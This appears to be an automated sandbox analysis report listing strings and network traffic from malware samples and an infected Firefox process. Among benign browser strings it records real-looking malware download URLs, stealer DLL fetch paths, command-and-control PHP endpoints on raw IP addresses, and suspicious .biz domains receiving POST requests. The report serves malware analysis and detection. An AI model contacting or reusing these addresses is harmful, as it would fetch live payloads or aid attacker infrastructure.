                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: webcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1*://cdn.branch.io/branch-latest.min.js*resource://gre/modules/addons/XPIProvider.jsm*://auth.9c9media.ca/auth/main.jswebcompat-reporter@mozilla.org.xpi*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/network/file-output-stream;1FileUtils_openAtomicFileOutputStreamFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat_video.js*://pub.doubleverify.com/signals/pub.js**://web-assets.toggl.com/app/assets/scripts/*.jspictureinpicture%40mozilla.org:1.0.0*://www.rva311.com/static/js/main.*.chunk.jshttps://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/all.js**://imasdk.googleapis.com/js/sdkloader/ima3.js*://adservex.media.net/videoAds.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://www.googletagservices.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://cdn.optimizely.com/public/*.js*://ssl.google-analytics.com/ga.js*://*.vidible.tv/*/vidible-min.js**://www.google-analytics.com/plugins/ua/ec.js*://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://cdn.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/webtrends.js*://www.google-analytics.com/analytics.js**://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/DeferredTask.sys.mjs equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3532560514.000001F944897000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F944581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: ogs.google.com
                          Source: global trafficDNS traffic detected: DNS query: apis.google.com
                          Source: global trafficDNS traffic detected: DNS query: play.google.com
                          Source: global trafficDNS traffic detected: DNS query: dare-curbys.biz
                          Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: youtube.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dare-curbys.biz
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F93286B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3487529007.000001F943DA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3487529007.000001F943DB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeh
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exey
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe3w
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exegwUo
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeH
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exel
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001470000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/405117-2476756634-1003
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllv
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllm
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll%L
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllesYo
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/B
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Q
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9R
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpES
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpQ
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpb03cdf9128c01bfdc9a9a24d7875lt-release
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfi
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpge
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpuS
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ul
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206CBAoaming
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206W
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206ta
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1W?
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/1.244.11/files/martin/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe001
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe001J
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe001f
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe5
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe76
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe760E
                          Source: skotes.exe, 00000016.00000002.3432522788.000000000101E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exeAppData
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exed7
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exend)
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3432522788.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exe(
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exe85062384760
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exeV
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exek
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/iles/martin/random.exe
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/add?substr=mixtwo&s=three&sub=
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/add?substr=mixtwo&s=three&sub=#d
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/add?substr=mixtwo&s=three&sub=3v
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/download
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/key
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/keyP
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/keyhqos.dll.mui
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/keyystem32
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/download
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/download21/files/download
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadB
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadH
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadMicrosoft
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadV
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadeer
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadm
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadn
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadt
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersion
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttps://m
                          Source: rhnew.exe, 00000019.00000003.2971473959.0000000001387000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971218158.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
